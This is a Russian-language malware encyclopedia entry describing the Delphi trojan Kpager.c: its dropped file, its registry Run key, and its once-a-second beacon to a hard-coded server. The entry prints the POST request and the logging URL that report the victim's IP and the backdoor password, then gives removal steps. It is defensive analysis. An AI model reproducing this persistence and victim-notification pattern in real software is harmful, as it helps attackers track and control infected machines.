Trojan-Notifier.Win32.Kpager.c

Материал из Total Malware Info

Trojan-Notifier.Win32.Kpager.c Троянская программа. Имеет размер 28 672 байт. Программа является приложением Windows (PE EXE-файл). Написана на Borland Delphi.

Инсталляция

После запуска троянец удаляет файл:

%WinDir%\bPPQ.exe

Затем копирует свое тело в файл:

%WinDir%\bPPQ.exe.

Для автоматического запуска при следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WINLIBUPT"="bPPQ.exe"

Деструктивна активность

Через каждую секунду троянец проверяет наличие соединения с Интернетом, если он доступен, соединяется с сервером по адресу http://205.188.248.57 и посылает ему следующий запрос:

POST /scripts/WWPMsg.dll HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)

Host: 127.0.0.1
Content-Length: 176
Connection: Keep-Alive

from=Kpage&fromemail=Kpager@kcom.org&subject=Your Victem is Online!&body=IP:<IP_зараженнго клмпьютера >
Trojan: Lithium
Port: 60
Trojan Password: mypassisbob&to=147069037&Send=Send+Message

Далее троянец открывает страницу:

http://bo***om/cgi-bin/RAlog.cgi?action=log&ip=<IP зараженного компьютера>& port=60&win=kcom&rpass=mypassisbob&LogKey=&ServerType=Lithium&id=MyVic

таким образом, сообщая злоумышленнику о выходе зараженного компьютера в сеть, с указанием его IP-адреса и некоторых других характеристик.

Рекомендации по удалению

1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
2. Удалить файл

%WinDir%\bPPQ.exe

3. Удалить значения ключа реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WINLIBUPT"="bPPQ.exe"